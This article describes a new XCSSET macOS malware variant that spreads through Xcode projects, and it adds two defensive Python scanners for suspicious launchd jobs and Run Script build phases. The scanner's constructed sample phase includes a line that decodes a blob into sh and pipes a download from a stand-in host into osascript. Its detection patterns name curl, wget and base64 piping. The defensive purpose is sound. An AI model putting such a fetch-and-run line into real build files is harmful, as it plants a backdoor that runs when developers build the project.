XCSSET macOS Malware
Cybersecurity researchers have identified a new, more sophisticated variant of the XCSSET malware targeting Apple macOS. While currently observed in limited attacks, this updated version demonstrates significant enhancements in stealth, persistence, and data exfiltration.
What Makes This Variant Different?
The latest XCSSET version introduces several key changes:
Clipboard Hijacking: It now monitors the clipboard for cryptocurrency wallet addresses and silently replaces them with attacker-controlled addresses, so a victim who copies an address and pastes it into a transaction sends the funds to the attacker.
Expanded Data Theft: Beyond Safari, the malware can now exfiltrate data from Mozilla Firefox.
Stealth and Persistence: Its payloads are run-only compiled AppleScripts, which ship without readable source, and it persists through LaunchDaemon entries, making it both difficult to detect and resilient across reboots.
Improved Infection Chain: Changes to the fourth stage of the attack involve fetching a final-stage AppleScript responsible for system information collection and module execution via a boot() function.
How XCSSET Infects macOS
XCSSET primarily targets Xcode projects used by software developers: the malicious payload sits inside the project and runs when the project is built, at which point the malware launches its modules. The exact distribution method is unclear, but shared or cloned Xcode projects are suspected to be a major vector, since a developer who builds someone else's project runs whatever that project contains.
Earlier this year, researchers had already noted improvements in this strain, including better error handling and three persistence techniques, in a variant designed to siphon sensitive data from compromised systems.
New and Updated Modules
The latest variant features several new or modified modules, each performing specific malicious functions:
vexyeqj (formerly seizecj)
- Downloads a module named bnk using osascript.
- Handles data validation, encryption/decryption, C2 communication, and logging.
- Incorporates clipboard hijacking capabilities.
neq_cdyd_ilvcmwx
- Exfiltrates files to the C2 server, similar to the older txzx_vostfdi module.
xmyyeqjx
- Establishes LaunchDaemon-based persistence.
jey
- Implements Git-based persistence.
iewmilh_cdyd
- Steals Firefox browser data using a modified HackBrowserData tool.
Additional updates include checks for the Telegram messaging app and logic modifications across various modules.
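The LaunchDaemon persistence described above (the xmyyeqjx module) is something a responder can hunt for directly. The audit below is an added example written for this page, not code from the researchers or from the malware analysis: it parses every launchd property list in a directory with Python's standard plistlib and flags jobs that invoke osascript or another interpreter, point at a compiled AppleScript or script file, reference hidden or world-writable staging paths, and are set to run at load and be kept alive. The indicator list, the directory layout and the two sample job definitions are assumptions constructed for the demonstration; the sample plists are written to a temporary directory so the script runs anywhere, and on a Mac you would point it at /Library/LaunchDaemons, /Library/LaunchAgents and ~/Library/LaunchAgents.

```python
import os
import plistlib
import re
import sys
import tempfile

# Heuristics chosen for this example; they are assumptions, not published signatures.
SCRIPT_INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python", "python3", "perl", "ruby"}
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/", "/private/var/folders/")
SCRIPT_EXT = re.compile(r"\.(scpt|scptd|applescript|sh|py|rb|pl)$", re.I)


def audit_job(job):
    """Return human-readable reasons a parsed launchd job dictionary looks suspicious.
    An empty list means nothing in the job tripped a heuristic."""
    args = job.get("ProgramArguments") or []
    argv = list(args) if args else ([job["Program"]] if job.get("Program") else [])
    reasons = []
    if argv and os.path.basename(argv[0]) in SCRIPT_INTERPRETERS:
        reasons.append(f"launches a script interpreter: {argv[0]}")
    for a in argv:
        if SCRIPT_EXT.search(a):
            reasons.append(f"argument is a script file: {a}")
        if "/." in a:
            reasons.append(f"path uses a hidden directory: {a}")
        if a.startswith(STAGING_DIRS):
            reasons.append(f"path under a world-writable staging directory: {a}")
    # RunAtLoad + KeepAlive is normal for real daemons, so only report it as context
    # when something else already looked wrong.
    if reasons and job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive: starts at boot and is restarted if killed")
    return reasons


def audit_dir(directory):
    """Map each suspicious plist file name in `directory` to its list of reasons.
    A plist that cannot be parsed is reported too, since that is itself unusual."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        try:
            with open(os.path.join(directory, name), "rb") as fh:
                job = plistlib.load(fh)
        except Exception as exc:
            results[name] = [f"unparseable plist: {exc}"]
            continue
        reasons = audit_job(job)
        if reasons:
            results[name] = reasons
    return results


# Constructed sample jobs (assumptions for the demo): an ordinary daemon and one in the
# shape of an osascript-driven job pointing at a compiled AppleScript in a hidden folder.
BENIGN_JOB = {
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/local/bin/backupd", "--daemon"],
    "RunAtLoad": True,
    "KeepAlive": True,
}
SUSPICIOUS_JOB = {
    "Label": "com.example.updater",
    "ProgramArguments": ["/usr/bin/osascript", "/Users/dev/Library/.cache/agent.scpt"],
    "RunAtLoad": True,
    "KeepAlive": True,
}


def write_sample_dir():
    """Write both sample jobs as XML plists into a fresh temporary directory."""
    d = tempfile.mkdtemp(prefix="launchd-audit-")
    for job in (BENIGN_JOB, SUSPICIOUS_JOB):
        with open(os.path.join(d, job["Label"] + ".plist"), "wb") as fh:
            plistlib.dump(job, fh)
    return d


if __name__ == "__main__":
    # Usage: python3 launchd_audit.py /Library/LaunchDaemons /Library/LaunchAgents
    # With no arguments the constructed samples are audited instead.
    for d in sys.argv[1:] or [write_sample_dir()]:
        for name, reasons in audit_dir(d).items():
            print(os.path.join(d, name))
            for r in reasons:
                print(f"  - {r}")
```

Run it as root so every plist under /Library is readable, and pair it with `launchctl list`, since the audit only sees jobs that have a property list on disk.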
Mitigation and Safety Measures
To reduce the risk posed by XCSSET, macOS users should:
- Keep their systems and software fully updated.
- Carefully inspect Xcode projects obtained from repositories or external sources.
- Be cautious when copying and pasting sensitive information, especially cryptocurrency wallet addresses: compare the entire pasted address against the intended one before confirming a transaction.
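Inspecting a cloned Xcode project means, above all, reading its Run Script build phases, which are the main place in project.pbxproj where arbitrary shell runs during a build (scheme pre- and post-actions in .xcscheme files are the other place to read). The scanner below is an added example for this page, not the researchers' tooling or anything taken from the malware: it walks the objects in a project.pbxproj, pulls the decoded shellScript out of every PBXShellScriptBuildPhase, and reports phases that invoke osascript, decode base64, download from the network, pipe text into an interpreter, or carry a long opaque blob. The indicator patterns are heuristics chosen for the example, and the embedded project excerpt is constructed: its placeholder blob decodes to nothing meaningful and the example.invalid host never resolves.

```python
import re
import sys
from dataclasses import dataclass, field

# Heuristic indicators of a build-time payload in a Run Script phase. They are
# assumptions for this example, not signatures published for XCSSET.
INDICATORS = [
    ("osascript invocation", re.compile(r"\bosascript\b")),
    ("base64 decode", re.compile(r"\bbase64\b[^\n|]*(-D|-d|--decode)")),
    ("remote download", re.compile(r"\b(curl|wget)\b")),
    ("piped into interpreter", re.compile(r"\|\s*(sh|bash|zsh|python3?|osascript)\b")),
    ("long opaque blob", re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")),
]

OBJ_HEAD = re.compile(r"([0-9A-F]{24})\s*(?:/\*\s*(.*?)\s*\*/)?\s*=\s*\{")
ISA_SHELL = re.compile(r"isa\s*=\s*PBXShellScriptBuildPhase\s*;")
SHELL_SCRIPT = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"', re.S)


@dataclass
class Finding:
    object_id: str
    name: str
    indicators: list = field(default_factory=list)
    script: str = ""


def _find_block_end(text, start):
    """Index just past the '}' closing the block opened before `start`. Quoted
    strings are skipped so braces such as ${SRCROOT} inside a script do not
    unbalance the count."""
    depth, i = 1, start
    while i < len(text) and depth:
        c = text[i]
        if c == '"':
            i += 1
            while i < len(text) and text[i] != '"':
                i += 2 if text[i] == "\\" else 1
        elif c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
        i += 1
    return i


def iter_objects(text):
    """Yield (object_id, comment_name, body) for each object in the pbxproj.
    Heuristic scanner, not a full old-style-plist parser."""
    pos = 0
    while (m := OBJ_HEAD.search(text, pos)):
        end = _find_block_end(text, m.end())
        yield m.group(1), m.group(2) or "", text[m.end():end - 1]
        pos = end


def _unescape(s):
    # pbxproj strings escape newlines and quotes as \n and \"
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def shell_script_phases(text):
    """All PBXShellScriptBuildPhase objects as (object_id, name, decoded script)."""
    for obj_id, name, body in iter_objects(text):
        if ISA_SHELL.search(body):
            m = SHELL_SCRIPT.search(body)
            yield obj_id, name, _unescape(m.group(1)) if m else ""


def scan_pbxproj(text):
    """Return a Finding for every Run Script phase that trips at least one indicator."""
    findings = []
    for obj_id, name, script in shell_script_phases(text):
        hits = [label for label, rx in INDICATORS if rx.search(script)]
        if hits:
            findings.append(Finding(obj_id, name, hits, script))
    return findings


# Constructed pbxproj excerpt: an ordinary lint phase and a phase in the shape of an
# obfuscated build-time dropper. The blob is a placeholder, not a real payload.
SAMPLE_PBXPROJ = r'''
// !$*UTF8*$!
{
	objects = {
		1A2B3C4D5E6F708192A3B4C5 /* Run SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run SwiftLint";
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint \"${SRCROOT}\"; fi\n";
		};
		C5B4A392817F6E5D4C3B2A10 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "echo ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/== | base64 -D | sh\ncurl -s http://example.invalid/m | osascript\n";
		};
		9F8E7D6C5B4A392817F6E5D4 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
		};
	};
}
'''

if __name__ == "__main__":
    # Usage: python3 scan_pbxproj.py MyApp.xcodeproj/project.pbxproj
    sources = [(p, open(p, encoding="utf-8").read()) for p in sys.argv[1:]] or [("<sample>", SAMPLE_PBXPROJ)]
    for label, text in sources:
        for f in scan_pbxproj(text):
            print(f"{label}: phase {f.object_id} ({f.name or 'unnamed'}) -> {', '.join(f.indicators)}")
```

Treat a hit as a reason to read the phase, not as proof of compromise: a legitimate script can download a toolchain or decode an embedded certificate, but a phase in a freshly cloned project that pipes decoded text into osascript should be read line by line before the project is ever built.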